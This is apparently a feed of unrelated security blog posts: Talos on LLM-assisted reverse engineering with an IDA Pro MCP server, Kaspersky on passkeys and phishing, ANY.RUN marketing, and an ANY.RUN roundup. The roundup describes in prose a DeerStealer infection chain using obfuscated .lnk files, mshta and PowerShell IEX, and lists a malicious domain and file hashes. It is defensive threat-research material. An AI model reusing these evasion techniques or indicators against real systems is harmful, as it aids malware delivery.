Figure 5. Comparison between human-made analyses and LLM results in renaming functions according to their behavior. 

By looking at the function names and comparing them to human analysis, both models got close to the expected results. Remember that the models had no context about the type of file and whether or not it was malicious before starting the analysis.  

In some cases, we can even see the cloud-based model providing more context in the function name than the human-made analysis, like “VIBE_CountRunningProcesses” and “VIBE_ModifyPEFileHeaderAndChecksum”.  

The difference in efficiency between the local LLM and cloud-based LLM gets clearer when examining the documented code. The instructions we gave in the prompts requested that the LLM execute these tasks while analyzing the code: 

  • “Rename variables and function parameters to more sensible names.” 
  • “Change the variable and argument types if necessary.” 
  • “Inspect the decompilation and add comments with your findings to important areas of code.” 
  • “If you encounter Windows API calls, document by adding comments to the code what the API call does and what parameters it accepts”.  

Looking at the results for the function responsible for making the HTTP requests to the server, the local LLM performs some of these tasks, although not thoroughly renaming all variables: 

Using LLMs as a reverse engineering sidekick
Figure 6. Sample function documented by the local LLM showing some variables not renamed as expected. 

The comment at the start of the function is very basic and not all variables were renamed, with many still using the default template name generated by the IDA Pro decompiler like “v15”, “v28” or “v25”.  

The Windows API call comments are also very simple, with a basic description of what the function is used for and a list of parameters and types it accepts.  

There are also tangible differences in the function analysis performed by the cloud-based and the local LLM solution. 

Using LLMs as a reverse engineering sidekick
Figure 7. Same function used in previous example, but now documented by the cloud-based LLM, with results more like what was expected. 

The code is much clearer, with the variables renamed to more sensible names, while the comments are much more insightful, describing the actual behavior of the function. We also saw that the cloud-based model added comments to more lines of code than the local model did. 

Based on the above, we can see that the use of LLM associated with MCP servers can be very helpful in assisting the analyst in understanding unknown code and improving the reverse engineering of malicious files. 

The capacity of quickly analyzing all binary functions and renaming them to sensible names could help speeding up analysis as it gives more context to the disassembled or decompiled code, while the analyst can focus on more complex pieces of code or obfuscation.  

Known issues and limitations 

Using any kind of automated tools in malware analysis has its issues and users must take proper precautions, as is true for anything involving computer security. This application also has limitations that may prevent it from being widely adopted, such as: 

  • Usage cost: The use of language models is usually associated with high cost per token input by the user or generated by the model. When analyzing complex malware with hundreds of functions, this cost can compound quickly and make it impractical as a solution. This is especially problematic with the use of MCP tools since they add their own content with instructions on how to use the tools to the user prompt. They also include any text extracted from the analysis like strings and disassembly/decompilation listing, and when all of this is put together, a simple query can cost several hundreds of thousands of tokens. 
  • Time overhead: The analyst using these tools needs to consider not only the time taken waiting for a response, but also the time taken creating the most efficient prompts to maximize results while reducing costs. A local model may reduce costs but also add considerable time to output results. 
  • Malicious tools: Since MCP servers are a somewhat recent technology used in a field that moves very fast, there is a proliferation of tools and applications that are available to users looking to use LLMs with their work. There is a variety of MCP clients and as many marketplaces where people can upload their MCP servers for anyone to use. Users need to be aware and take careful consideration of which tool they are using, as these applications may intentionally or unintentionally contain malicious code, which may compromise the researchers using them.  
  • Vulnerabilities: As is true with other computer applications, MCP protocol and LLMs have attack surfaces that can be exploited in many ways to compromise the data being generated or the actual user’s machine. Prompt injection, MCP tool poisoning, tool privilege abuse and other techniques may be used to compromise the generated data, exfiltrate sensitive data, expose confidential code or tokens and even execute code remotely. 

IDA Pro MCP server installation 

Now that we’ve seen how useful a local model can be in helping the analyst perform reverse engineering on malicious files, let’s learn how to set up the environment.  

The process of installing and configuring an MCP server to use with your disassembler may vary depending on the software stack you plan to use, but to give readers an idea of how the process works and discuss some caveats that may impact the results, we will review the installation of an MCP server integrated with IDA Pro. The process will be very similar if you’re using different versions, as well as if you prefer to use Ghidra instead of IDA Pro. 

A good tutorial on how to install and configure an MCP server for a Ghidra disassembler is available at Laurie Wired‘s Github. The process described on their page is very similar to what is shown here. 

Install Ollama local LLM 

Installing Ollama is straightforward using the installer provided on their website. Once installed, you may download the model you plan to use with the following command. In this case we are using Devstral: 

ollama pull devstral:latest

Once the model is downloaded you may run Ollama in server mode using the command “ollama serve”. At any point after the server is running you can use the command “ollama ps” to list information about the running model. This will give information about the loaded model as well as the CPU and GPU memory it is currently using. This information is useful to understand how your choice of model and context will affect performance, as explained previously. 

Using LLMs as a reverse engineering sidekick
Figure 8. Example of processor and GPU usage by the local LLM during processing of one of the prompts shown before. 

Note: If the machine running Ollama is not the same machine where you will run the MCP server and IDA, you may need to enable Ollama to listen for connection on any network interface since by default it only listens to the localhost interface. In order to do that, you need to create a system wide environmental variable: 

OLLAMA_HOST=0.0.0.0:9999 

This example tells Ollama to listen on any interface and use port 9999 for the server. You need to ensure this port is accessible from the machine running the MCP client for this to work. 

Install MCP Server and MCP IDA Pro plugin 

Installing Mrexodia’s MCP Server is also pretty simple, but there’s an important step that needs to be completed before starting the installation if you’re using IDA Pro. The server requires Python 3.11 and installs several Python modules to work. These modules need to be accessible from the Python environment inside IDA Pro, which by default comes with its own Python installation. To make sure IDA Pro and the MCP server are using the same version, you need to ensure IDA is using the same Python version you have on your default path.  

This is done using a tool available in the IDA Pro installation folder. In our case we are using IDA Pro 8.5 so the tool is located at “c:Program FilesIDA Pro 8.5idapyswitch.exe”. Running the tool will give you a list of currently installed Python versions and let you choose the one IDA will use: 

Using LLMs as a reverse engineering sidekick
Figure 9. Example usage of the IDApyswitch tool to choose the correct python version to use in IDA.

Once IDA is using the same Python version needed by the MCP Server, you can install the server following the process from their Github page: 

pip uninstall ida-pro-mcp
pip install git+https://github.com/mrexodia/ida-pro-mcp
ida-pro-mcp --install

This will install the required modules and copy the IDA Pro plugin to its proper location. The final step is to run the MCP server. This step is necessary if you’re using Cline or Roo Code inside VSCode, as these tools don’t work well with the server running directly by the client. To run the MCP server, use the command in Figure 10 and ensure the terminal where it is running stays open for the duration of your analysis session. 

Using LLMs as a reverse engineering sidekick
Figure 10. Example command to run the MCP server from command line. 

 The last step is to ensure the MCP plugin is working and running inside IDA. Once you have a file open in the disassembler, you can start the MCP Plugin component by going to “Edit->Plugins->MCP” or using the hotkey “Control+Alt+M.” You should see a message informing you the server started successfully in the IDA output window. 

Using LLMs as a reverse engineering sidekick
Figure 11. Message showing the successful start of the MCP plugin in IDA.

 Install and configure MCP client 

The last step is to install the MCP client, which will work as a connector to all other components. The installation process will vary depending on which tools you choose, but in this case, we will use VSCode with the Cline extension. In VSCode, go to the Extensions Marketplace and search for Cline. Click on the Install button and wait for the installation to finish. 

A new tab will appear in the left tab menu with the Cline extension icon. This interface is how you are going to interact with the IDA Pro MCP Server and the LLM. 

Using LLMs as a reverse engineering sidekick
Figure 12. Cline extension main interface. 

Clicking on the gear icon in the top right menu takes you to the Configuration page, where you must configure the LLM model you’re using. Once you choose the API provider, you need to configure the base URL and model name at least, but cloud-based models will require an API key, as well. The settings in Figure 13 are for a local model running on Ollama. 

Using LLMs as a reverse engineering sidekick
Figure 13. Cline extension LLM configuration page.

The next step is to configure the MCP server in Cline. This is how Cline will know which servers are available and what tools each server provides. These settings are found in the icon with three bars at the top right menu. 

The MCP server can be configured in the “Remote Servers” tab, or you can directly edit the configuration file. The example in Figure 14 shows both options to configure the MCP server we set up in the previous step: 

Using LLMs as a reverse engineering sidekick
Figure 14. Cline extension MCP server configuration. 

Once this is done, you should see something similar to Figure 15 on your “Installed” tab, indicating that Cline is able to talk to the MCP Server and the IDA Pro plugin. 

Using LLMs as a reverse engineering sidekick
Figure 15. MCP server list of available tools.

 Now that everything is set up, you may begin to use the Cline chat window to query the IDA Pro database currently open and perform analysis. 

Coverage 

Ways our customers can detect and block this threat are listed below. 

Using LLMs as a reverse engineering sidekick

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org

Snort SIDs for the threats are:  

  • Snort2: 58835 
  • Snort3: 300262 

ClamAV detections are also available for this threat:  

  • Win.Keylogger.Tedy-9955310-0 

Cisco Talos Blog – ​Read More

Passkey support in business applications | Kaspersky official blog

Transition to passkeys promises organizations a cost-effective path toward robust employee authentication, increased productivity, and regulatory compliance. We’ve already covered all the pros and cons of this business solution in a separate, in-depth article. However, the success of the transition — and even its feasibility — really hinges on the technical details and implementation specifics across numerous corporate systems.

Passkey support in identity management systems

Before tackling organizational hurdles and drafting policies, you’ll have to determine if your core IT systems are ready for the switch to passkeys.

Microsoft Entra ID (Azure AD) fully supports passkeys, letting admins set them as the primary sign-in method. For hybrid deployments with on-premises resources, Entra ID can generate Kerberos tickets (TGTs), which your Active Directory domain controller can then process.

However, Microsoft doesn’t yet offer native passkey support for RDP, VDI, or on-premises-only AD sign-ins. That said, with a few workarounds, organizations can store passkeys on a hardware token like a YubiKey. This kind of token can simultaneously support both the traditional PIV (smart cards) technology and FIDO2 (passkeys). There are also third-party solutions for these scenarios, but you’ll need to evaluate how using them impacts your overall security posture and regulatory compliance.

Good news for Google Workspace and Google Cloud users: they offer full passkey support.

Popular identity management systems like Okta, Ping, Cisco Duo, and RSA IDplus also support FIDO2 and all major forms of passkeys.

Passkey support on client devices

We have a detailed post on the subject. All modern operating systems from Google, Apple, and Microsoft support passkeys. However, if your company uses Linux, you’ll likely need extra tools, and overall support is still limited.

Also, while for all major operating systems it might look like full support on the surface, there’s a lot of variety in how passkeys are stored, and that can lead to compatibility headaches. Combinations of several systems like Windows computers and Android smartphones are the most problematic. You might create a passkey on one device and then find you can’t access it on another. For companies with a strictly managed device fleet, there are a couple of ways to tackle this. For example, you could have employees generate a separate passkey for each company device they use. This means a bit more initial setup: employees will need to go through the same process of creating a passkey on every device. However, once that’s done, signing in takes minimal time. Plus, if they lose one device, they won’t be completely locked out of their work data.

Another option is to use a company-approved password manager to store and sync passkeys across all employees’ devices. This is also a must for companies using Linux computers, as its operating system can’t natively store passkeys. Just a heads-up: this approach might add some complexity when it comes to regulatory compliance audits.

If you’re looking for a solution with almost no issues with sync and multiple platforms, hardware passkeys like the YubiKey are the way to go. The catch is that they can be significantly more expensive to deploy and manage.

Passkey support in business applications

The ideal scenario for bringing passkeys into your business apps is to have all your applications sign in through single sign-on (SSO). That way, you only need to implement passkey support in your corporate SSO solution, such as Entra ID or Okta. However, if some of your critical business applications don’t support SSO, or if that support isn’t part of your contract (which, unfortunately, happens), you’ll have to issue individual passkeys for users to sign in to each separate system. Hardware tokens can store anywhere from 25 to 100 passkeys, so your main extra cost here would be on the administrative side.

Popular business systems that fully support passkeys include Adobe Creative Cloud, AWS, GitHub, Google Workspace, HubSpot, Office 365, Salesforce, and Zoho. Some SAP systems also support passkeys.

Employee readiness

Rolling out passkeys means getting your team up to speed regardless of the scenario. You don’t want them scratching their heads trying to figure out new interfaces. The goal is for everyone to feel confident using passkeys on every single device. Here are the key things your employees will need to understand.

  • Why passkeys beat passwords (they’re much more secure, faster to sign in with, and don’t need to be rotated)
  • How biometrics work with passkeys (the biometric data never leaves the device, and isn’t stored or processed by the employer)
  • How to get their very first passkey (for example, Microsoft has a Temporary Access Pass feature, and third-party IAM systems often send an onboarding link; the process needs to be thoroughly documented, though)
  • What to do if their device doesn’t recognize their passkey
  • What to do if they lose a device (sign in from another device that has its own passkey, or use an OTP, perhaps given to them in a sealed envelope for just such an emergency)
  • How to sign in to work systems from other computers (if the company’s policies permit it)
  • What a passkey-related phishing attempt might look like

Passkeys are no silver bullet

Moving to passkeys doesn’t mean your cybersecurity team can just cross identity threats off their risk list. Sure, it makes things tougher for attackers, but they can still do the following:

  • Target systems that haven’t switched to passkeys
  • Go after systems that still have fallback login methods like passwords and OTPs
  • Steal authentication tokens from devices infected with infostealers
  • Use special techniques to bypass passkey protections

While it’s impossible to phish the passkey itself, attackers can set up fake web infrastructure to trick a victim into authenticating and validating a malicious session on a corporate service.

A recent example of this kind of AiTM attack was documented in the U.S. In that incident, the victim was lured to a fake authentication page for a corporate service, where attackers first phished their username and password, and then the session confirmation by having them scan a QR code. In this incident, the security policies were configured correctly, so scanning this QR code did not lead to successful authentication. But since such a mechanism with passkeys was implemented, the attackers hope that somewhere it is configured incorrectly, and the physical proximity of the device on which authentication is carried out and the device where the key is stored is not checked.

Ultimately, switching to passkeys requires detailed policy configuration. This includes both authentication policies (such as disabling passwords when a passkey is available, or banning physical tokens from unknown vendors) and monitoring policies (such as logging passkey registrations or cross-device scenarios from suspicious locations).

Kaspersky official blog – ​Read More

CISO Blueprint: 5 Steps to Enterprise Cyber Threat Resilience 

Why are SOC teams still struggling to keep up despite heavy investments in security tools? False positives pile up, evasive threats slip through, and critical alerts often get buried under noise. For CISOs, the challenge is giving teams the visibility and speed they need to respond before damage is done. 

ANY.RUN helps close that gap. 95% of companies using the solution report faster investigations and shorter response times because their teams aren’t waiting on static reports or incomplete data. Instead, they get real-time insight into how threats behave, enabling faster decisions, fewer delays, and a measurable boost in SOC performance. 

This CISO blueprint outlines five strategic steps to help your enterprise SOC reach new levels of resilience with proven results. 

Proven Results from the Front Lines of the SOC 

Security leaders are seeing real operational gains after integrating ANY.RUN into their workflows. 

🏆 Key ANY.RUN stats
  • 90% of companies report higher detection rates after adopting ANY.RUN
  • SOC teams improve performance by up to 3x
  • 74% of Fortune 100 companies rely on ANY.RUN in their security operations
  • Trusted by 15,000+ organizations across finance, telecom, retail, government, and healthcare

Take Expertware, for example, a leading European IT consultancy. Facing growing pressure to shorten investigation timelines and scale without hiring, they adopted ANY.RUN’s sandbox. What used to take hours of manual work now happens in minutes thanks to real-time, interactive malware analysis. 

What changed after implementing ANY.RUN’s sandbox? 

  • 50% reduction in malware investigation time 
  • Improved team collaboration, with shared reports and interactive analysis reducing handoff delays 
  • Deeper threat visibility, including multi-stage and fileless malware 
  • Faster client response, with clearer reports enabling quicker decision-making 

ANY.RUN helped them eliminate the overhead of manual setups while improving threat clarity, leading to stronger security outcomes for both their team and their clients. 

1. Deploy Real-Time Threat Analysis for Early Detection

When time is everything, waiting on static scans or post-execution reports just doesn’t cut it. To respond effectively, SOCs need a clear view of the threat as it happens. 

ANY.RUN’s sandbox delivers that clarity through live detonation, giving your team an immediate look at the full scope of any malware or phishing attack. From execution flow to network connections and dropped payloads, everything is visible in real time. 

Phishing attack analyzed inside ANY.RUN sandbox 

What sets ANY.RUN sandbox apart is interactivity. Analysts can engage with the sample mid-execution, clicking buttons, opening files, entering credentials, just like a real user. That means no waiting for analysis to complete and no relying on partial data. Threat behavior becomes obvious in seconds, allowing your team to move faster and with greater confidence. 

Integrate ANY.RUN’s Interactive Sandbox in your SOC
Automate threat analysis, cut MTTD, & boost detection rate 



Contact us


2. Automate Triage to Reduce Analyst Workload and Alert Fatigue 

Not all threats reveal themselves with a simple scan. Many phishing kits and malware samples are designed to evade detection unless specific user actions are taken, like solving a CAPTCHA, clicking a hidden button, or opening a malicious link embedded in a QR code. 

View real case with QR code analysis 

QR code analyzed and malicious URL opened in a browser automatically by ANY.RUN 

ANY.RUN tackles this head-on. With Automated Interactivity, available in the Enterprise plan, it simulates real user behavior, solving CAPTCHAs, navigating redirects, opening files and links hidden inside QR codes or archives. This allows the sandbox to detonate even evasive threats automatically, giving your team faster, more accurate results with less manual effort. 

See a video recording of the analysis performed by Automated Interactivity

The outcome? 

  • Higher detection rates 
  • Faster triage 
  • Reduced alert fatigue 
  • More time to focus on high-impact threats 

This type of automation also lowers the pressure on junior analysts, who can now complete complex investigations without relying on senior teammates to step in. With ANY.RUN handling the hard parts of triage, your team detects threats faster and stays focused on response, not troubleshooting. 

3. Boost SOC Performance through Collaboration and a Unified Security Stack 

Tools alone won’t fix slow investigations or fragmented response workflows; collaboration is just as critical

ANY.RUN is built to support this from the ground up. Designed for high-performing SOCs, its Teamwork feature gives analysts a shared workspace where roles are clearly defined, tasks are tracked in real time, and managers can supervise without disrupting the flow. Whether your team is in one office or spread across time zones, everyone stays aligned and productive. 

  • Clear task ownership to prevent duplication and confusion 
  • Role-based access and oversight for team leads 
  • Scalable structure that grows with your team 
  • Built-in activity tracking to monitor productivity 
Team management displayed inside ANY.RUN sandbox 

And it doesn’t stop there. ANY.RUN integrates seamlessly with your existing SOAR, XDR, or SIEM platforms, allowing teams to analyze suspicious files straight from alerts, enrich incidents with fresh IOCs, and manage security workflows without leaving their familiar interfaces.  

You can set up integration with other security vendors with ease  

One of the latest integrations is with IBM QRadar SOAR, a widely used platform for incident response. With ANY.RUN’s official app, teams can: 

  • Launch sandbox analyses directly from SOAR playbooks 
  • Enrich cases with real-time IOCs and behavioral insights 
  • Automate repetitive steps to reduce Mean Time to Respond (MTTR) 

Setup takes just minutes; plug in your API key, and your team is ready to go. 

ANY.RUN app for IBM QRadar SOAR 

Together, this connected and collaborative approach leads to faster decisions, higher output, and a stronger, more efficient SOC. 

4. Ensure Privacy and Compliance to Prevent Data Leaks 

Threat detection means little if it compromises sensitive data in the process. For CISOs, building a resilient security program also means ensuring that investigations don’t create new risks, like exposing internal files, violating client confidentiality, or falling out of compliance. 

ANY.RUN addresses this risk with robust privacy controls designed for enterprise SOCs. Teams can conduct investigations in a fully private sandbox, ensuring that no data is accidentally exposed or shared outside the organization. Role-based visibility settings let team leads define who sees what, while granular access controls prevent analysts from unintentionally publishing sensitive tasks. 

Manage privacy in your team settings 

You also get flexible private analysis options that scale with your team: 

  • Unlimited private analyses per user 
  • Or unlimited users with per-analysis pricing 

This means your investigations stay confidential without compromising collaboration or growth. 

To further tighten access and simplify security management, ANY.RUN supports Single Sign-On (SSO). Analysts can log in using existing organizational credentials, improving both security and ease of use. Onboarding, offboarding, and daily access become seamless, reducing risk and helping you stay compliant with internal policies and external standards. 

5. Move From Reactive to Proactive Security 

Staying ahead of modern threats demands proactive insight into what’s coming next. But for many CISOs, building that foresight into daily workflows is still a challenge. With queues overflowing and teams focused on triage, opportunities to uncover patterns, enrich investigations, and harden defenses often slip through the cracks. 

That’s where ANY.RUN’s Threat Intelligence Lookup (TI Lookup) delivers a clear advantage. 

TI Lookup gives access to an extensive database of the latest IOCs, IOBs, and IOAs 

TI Lookup gives your SOC team instant access to threat data sourced from millions of malware detonation sessions, with real-world samples, IOCs, IOBs, IOAs, and TTPs updated within hours of an attack, not days or weeks later. It’s built to accelerate investigation, support informed decisions, and drive proactive defense across your infrastructure. 

With free access, your team can: 

  • Enrich alerts with context from recent sandbox sessions 
  • Link artifacts to real-world malware campaigns targeting over 15,000 companies globally 
  • Reduce MTTR by quickly identifying behaviors, payloads, and known threat families 
  • Gather intelligence to improve SIEM, IDS/IPS, or EDR rule creation 

Get instant threat context with TI Lookup
Act faster. Slash MTTR. Stop breaches early 



Try now. It’s free!


Build a Smarter, More Resilient SOC Starting Now 

Resilience is built with visibility, automation, and collaboration that work together across your entire SOC. From accelerating detection to reducing manual workload, ANY.RUN gives security teams the tools they need to respond faster, dig deeper, and stay ahead of evolving threats. 

Whether you’re modernizing your stack or scaling operations, a live, interactive sandbox can be the force multiplier your team needs. 

Ready to see how it fits into your environment? 
Contact us for integration and start strengthening your threat response with speed and precision. 

About ANY.RUN 

ANY.RUN is built to help security teams detect threats faster and respond with greater confidence. Our interactive sandbox platform delivers real-time malware analysis and threat intelligence, giving analysts the clarity they need when it matters most. 

With support for Windows, Linux, and Android environments, our cloud-based sandbox enables deep behavioral analysis without the need for complex setup. Paired with Threat Intelligence Lookup and Feeds, ANY.RUN provides rich context, actionable IOCs, and automation-ready outputs, all with zero infrastructure burden. 

Start your 14-day trial now → 

The post CISO Blueprint: 5 Steps to Enterprise Cyber Threat Resilience  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Cisco Talos at Black Hat 2025: Briefings, booth talks and what to expect

Cisco Talos at Black Hat 2025: Briefings, booth talks and what to expect

Cisco Talos is back at Black Hat with new research, threat detection overviews and opportunities to connect with our team. Whether you’re interested in what we’re seeing in the threat landscape, detection engineering or real-world incident response, here’s where and how to find us: 

Visit us at the Cisco booth: 2726 

We’ll have short, 15-minute booth talks throughout Wednesday and Thursday of Black Hat, with topics including: 

  • Talos Vulnerability Discovery Year in Review 
  • How to: Threat Intel 
  • Full Metal SnortML: Accelerating Machine Learning based Firewalls with FPGAs 
  • From CVE to Detection: A Rule Writer’s Journey Through Modern Threats 

We also have these sessions as part of the wider conference agenda: 

Lunch & Learn: Backdoors & Breaches 

Lagoon KL, Level 2 | Wednesday, Aug 6, 12:05–1:30 PM  
Speaker: Joe Marshall 

Join Joe and members of Talos as we discuss and develop incident response plans in real-time. We’ll use real scenarios over a game of Backdoors & Breaches, an incident response card game developed by Black Hills Information Security. Members from Talos Threat Intelligence will lead tables through the game over lunch and discuss recent threat trends. 

Reserve your spot here 

Sponsored Session: Generative AI as a Lure, Tool and Weapon 

Mandalay Bay I | Wednesday, Aug 6, 11:20–12:10 PM  
Speaker: Nick Biasini 

Nick will explore how generative AI is shaping today’s threat landscape, from attackers using AI to enhance operations, to malware posing as AI tools, to efforts targeting the models themselves. The session will also cover how organizations can safely adopt GAI while defending against its misuse. 

Learn more here 

Threat Briefing: ReVault! Compromised by Your Secure SoC 

Oceanside C, Level 2 |  Wednesday, Aug 6, 10:20–11:00 AM 
Speaker: Philippe Laulheret 

This talk introduces ReVault, a vulnerability affecting a widely used embedded security chip. Philippe will demonstrate how a low-privilege user can exploit the flaw to extract sensitive data, gain persistence at the firmware level, and compromise the host system.  

Learn more here 

Visit the Splunk Booth: Threat Hunters Cookbook Launch 

Splunk Booth 3046

Our colleagues at Splunk will be launching their brand new Threat Hunters Cookbook in hard copy. We’ve had a sneak preview, and trust us, this is a brilliant resource for those who want to use modelling and machine learning to conduct threat hunts that really get the best out of your efforts.  

 

If you’re at the show, we’d love to hear what you’re working on, so stop by the Cisco booth (and grab yourself a Snorty while you’re at it). See you in Vegas! 

Cisco Talos Blog – ​Read More

What to do if you get a phishing email | Kaspersky official blog

Phishing emails typically end up in the spam folder, because today’s security systems easily recognize most of them; however, these systems aren’t completely reliable, so some bona fide email messages land in the junk folder too. This article explains how to detect phishing emails, and what to do about them.

Signs of phishing email

There are several markers that are widely believed to indicate a message sent by scammers. Below are some examples.

  • Catchy subject line. A phishing message will likely represent a fraction of all the mail landing in your inbox. This is why scammers usually try to make their subject lines stand out by using trigger words like “urgent”, “prize”, “cash”, “giveaway”, or similar, designed to prompt you to open the message as quickly as possible.
  • Call to action. You can bet the message will encourage you to do at least one of the following: click a link, pay for something you don’t really need, or check the details in an attachment. The attackers’ primary goal is to lure victims away from their email and into unsafe spaces where they’re tricked into spending money or surrendering access to their accounts.
  • Expiring timer. The message might feature a timer that says, “Follow this link. It expires in 24 hours.” All these tricks are just nonsense. Scammers want to rush you so you start to panic and stop thinking carefully about your money.
  • Mistakes in the email body. In the past year, there’s been an increase in phishing emails sent in multiple languages at once, often with some odd mistakes.
  • Suspicious sender address. If you live in, say, Brazil, and you get an email message from an Italian address, that’s a red flag and a good reason to completely ignore its contents.

An impersonal greeting like “Dear %username%” used to be a sure sign of a phishing email, but scammers have moved on from that. Targeted messages addressing the victim by name are becoming increasingly common. Ignore those too.

What to do if you get a phishing email

If you’ve managed to spot one using the signs described above, well done — you’re awesome! You can go ahead and delete it without even opening. And if you want to do your good deed for the day, report the phishing attempt via Outlook or Gmail to make this world a tiny bit safer. We understand that spotting phishing in your email right away isn’t easy — so here’s a short list of don’ts to help with detection.

Don’t open attachments

Scammers can hide malware inside various types of email attachments: images, HTML files, and even voice messages. Here’s a recent example: you get an email with an attachment that appears to be a voice message with the SVG extension, but that’s typically an image format… To listen to the recording, you have to open the attachment, and what do you know — you find yourself on a phishing site that masquerades as Google Voice! And no, you don’t hear any audio. Instead, you’re redirected to another website where you’ll be prompted to enter the login and password for your email account. If you’re interested in learning more, here’s a Securelist blog post on this.

It seems that voice messages are sent more often through messengers than by email

It seems that voice messages are sent more often through messengers than by email

This and other stories just go to show you shouldn’t open attachments. Any attachments. At all. Especially if you weren’t expecting the message in the first place.

Don’t open links

This is a golden rule that will help keep your money and accounts safe. A healthy dose of caution is exactly what everyone needs when using the internet. Let’s take a look at this phishing message.

An "exciting win-win", but only the scammers benefit

An “exciting win-win”, but only the scammers benefit

Does this look odd? It’s written in two languages: Russian and Dutch. It shows the return address of a language school in the Netherlands, yet it references the Russian online marketplace Ozon. The message body congratulates the recipient: “You are one of our few lucky clients who get a chance to compete for uncredible prizes.” “Competing for prizes” is easy: just click the link, which has been thoughtfully included twice.

A week later, another message landed in the same inbox. Again, it came in two languages: Italian and Russian. This one came from a real Italian email address associated with the archive of Giovanni Korompay‘s works. The artist passed away in 1988. No, this wasn’t an offer to commemorate the painter. Most likely, hackers have breached the archive’s email account and are now sending phishing mail about soccer betting pretending to be from that source. All of that looks a rather fishy.

Another email in two languages

Another email in two languages

These messages have a lot in common. One thing we didn’t mention is how phishing links are disguised. Scammers deliberately use the TinyURL link shortener to make links look as legitimate as possible. But the truth is, a link that starts with tinyurl.com could point to anything: from the Kaspersky Daily blog to something malicious.

Don’t believe what’s written down

Scammers come up with all sorts of tricks: pretending to be Nigerian princes, sending fake Telegram Premium subscriptions, or congratulating people on winning fake giveaways. Every week, I get email with text like this: “Congratulations! You can claim your personal prize.” Sometimes they even add the amount of the supposed winnings to make sure I open the message. And once, I did.

The scammers were too lazy to shorten this link

The scammers were too lazy to shorten this link

Inside, it’s all by the book: a flashy headline, congratulations, and calls to click the link. To make it seem even more convincing, the email is supposedly signed by a representative from the “Prize Board of the Fund”. What fund? What prize board? And how could I possibly have won something I never even entered into? That part is unclear.

You may have noticed the unusual design of this message: it clearly stands out from the previous examples. To add credibility, the scammers used Google Forms, Google’s official service for surveys and polls. The scheme is a simple one: they create a survey, set it up to send response copies to the email addresses of their future victims, and collect their answers. Read Beware of Google Forms bearing crypto gifts to find out what happens if you open a link like that.

The bottom line

Following these rules will protect you from many — but not all — of the tricks that attackers might come up with. That’s why we recommend trusting a reliable solution: Kaspersky Premium. Every year, our products undergo testing by the independent Austrian organization AV-Comparatives to evaluate their ability to detect phishing threats. We described the testing procedure in a post a year ago. In June 2025, Kaspersky Premium for Windows successfully met the certification criteria again and received the Approved certificate, a mark of quality in protecting users from phishing.

Important clarification: at Kaspersky, we use a unified stack of security technologies, which is what the experts tested. This means the Kaspersky Premium for Windows award also applies to our other products for home users (Kaspersky Standard, Kaspersky Plus, and Kaspersky Premium) and for businesses (such as Kaspersky Endpoint Security for Business and Kaspersky Small Office Security).

More about phishing:

Kaspersky official blog – ​Read More

Major Cyber Attacks in July 2025: Obfuscated .LNK‑Delivered DeerStealer, Fake 7‑Zip, and More

While cybercriminals were working overtime this July, so were we at ANY.RUN — and, dare we say, with better results. As always, we’ve picked the most dangerous and intriguing attacks of the month. But this time, there’s more. 

Alongside the monthly top, we are highlighting a key trend that’s been powering campaigns throughout 2025: the top 5 Remote Access Tools most abused by threat actors in the first half of the year. 

The threats were investigated with ANY.RUN’s Interactive Sandbox, where you can trace the full attack chain and see malware behavior in action, and our Threat Intelligence Lookup (available now for free), which helps you turn raw IOCs into actionable intelligence to better protect your organization. 

DeerStealer Delivered via Obfuscated .LNK and LOLBin Abuse 

Post On X 

Detailed DeerStealer attack chain 

The recent phishing campaign delivers malware through a fake PDF shortcut (Report.lnk) that leverages mshta.exe for script execution, which is a known LOLBin technique (MITRE T1218.005).  

ANY.RUN’s Script Tracer reveals the full chain, including wildcard LOLBin execution, encoded payloads, and network exfiltration, without requiring manual deobfuscation.   

View analysis session in the Sandbox 

The attack begins with a .lnk file that covertly invokes mshta.exe to drop scripts for the next stages. The execution command is heavily obfuscated using wildcard paths. 

Fake Report.lnk detonated in the sandbox 

To evade signature-based detection, PowerShell dynamically resolves the full path to mshta.exe in the System32 directory. It is launched with flags, followed by obfuscated Base64 strings. Both logging and profiling are disabled to reduce forensic visibility during execution. 

Characters are decoded in pairs, converted from hex to ASCII, reassembled into a script, and executed via IEX. This ensures the malicious logic stays hidden until runtime.  

The script dynamically resolves URLs and binary content from obfuscated arrays, downloads a fake PDF to distract the user, writes the main executable into AppData, and silently runs it. The PDF is opened in Adobe Acrobat to distract the user.  
 
You can use Threat Intelligence Lookup to find malware samples using similar techniques with fake .lnk files and PowerShell commands to enrich your company’s detection systems.  
 
Search for suspicious shortcut attachments: threatName:”susp-lnk” 

Sandbox analyses of suspicious .lnk files 

Query TI Lookup for a snippet in PowerShell command: commandLine:”| IEX” 

PowerShell command search results 

IOC for the threat detection and research:  

  • https[:]//tripplefury[.]com/ 
  • Fd5a2f9eed065c5767d5323b8dd928ef8724ea2edeba3e4c83e211edf9ff0160 
  • 8f49254064d534459b7ec60bf4e21f75284fbabfaea511268c478e15f1ed0db9 

Speed up triage and incident response
with instant access to live attack data from 15K SOCs 



Try TI Lookup. It’s free!


ANY.RUN’s analysts were one of the first teams to research a DeerStealer distribution campaign when it had just emerged: read the article in our blog and keep an eye on this malware.  

